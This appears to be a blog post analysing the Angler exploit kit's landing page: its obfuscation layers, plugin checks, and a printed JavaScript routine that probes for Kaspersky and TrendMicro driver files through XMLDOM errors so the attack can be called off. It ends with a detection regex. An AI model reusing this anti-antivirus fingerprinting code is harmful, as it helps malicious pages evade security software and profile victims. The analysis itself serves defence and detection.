Basic structure
The landingpage is built up of two stages of obfuscation where there are five containers at the beginning of the page with obfuscated data (one for each line), each with it's own specific purpose. In the landingpage used in this example [pastebin] you'll find these five on lines 28-32.After the five containers comes the function for deobfuscating and executing the code in the each container.
The section that comes next includes obfuscated strings which will be used by the code in the containers at the top, this includes domain and URI for the exploits.
The rest of the landingpage is simply just a decoy to make the page look "legit".
Client identification
Angler does not only use plugin-detection to identify vulnerable versions, it does also employ detection of installed anti-virus software. This is done through the code in the first container. The code can be found by setting a breakpoint on the line calling eval() in the deobfuscation-function: |
| Firefox Webdeveloper Debugger |
function gs7sfd(txt) {
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.async = true;
xmlDoc.loadXML('');
if (xmlDoc.parseError.errorCode != 0) {
var err = "Error Code: " + xmlDoc.parseError.errorCode + "\n";
err += "Error Reason: " + xmlDoc.parseError.reason;
err += "Error Line: " + xmlDoc.parseError.line;
if (err.indexOf("-2147023083") > 0) {
return 1;
} else {
return 0;
}
}
return 0;
}
if (gs7sfd("c:\\Windows\\System32\\drivers\\kl1.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmactmon.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmcomm.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmevtmgr.sys") || gs7sfd("c:\\windows\\system32\\drivers\\TMEBC32.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmeext.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmnciesc.sys") || gs7sfd("c:\\windows\\system32\\drivers\\tmtdi.sys")) {
window['zxtbVDMp'] = true;
BzJUQufh = '';
window.sf325gtgs7sfdj = window.sf325gtgs7sfds = window.sf325gtgs7sfdf1 = window.sf325gtgs7sfdf2 = false;
};
If it should find that if Kaspersky or TrendMicro anti-virus is installed, it will cancel the intrusion attempt as it's likely to fail and unwanted noise is created (alerts from anti-virus). Another interesting part is that if you look at the landingpage of RIG you'll find that it uses the exact same code, which is originally found in "Operation Snowman".
The code in the second container is responsible for checking the version of installed plugins, but also the function for decoding the strings listed in the original landingpage where the key is defined in the variable ending with 0:
 |
| Original landingpage on the left, code in second container on the right |
 |
| Original landingpage on the left, code in third container on the right |
A summary of all deobfuscated sections can be found on pastebin. [pastebin]
Detection
Angler is one of the kits which have a generic look when it comes to the landingpage request, the response however is another story as shown above.The top containers are changing from instance to instance but the variables after the deobfuscation function doesn't (i.e the variables ending with 0-11), they follow the same pattern. Some examples:
 |
| Three different landingpages |
/[A-Za-z]{6}([0-9])?0\s=\s'[A-Za-z0-9]{20}',\x0a/
Resources
For those who use Snort/Suricata which only capture the trigger-packet, this script could help in decoding the strings and revealing the source domain. [pastebin]More examples of Angler can be found from malware-traffic-analysis.net
Inga kommentarer:
Skicka en kommentar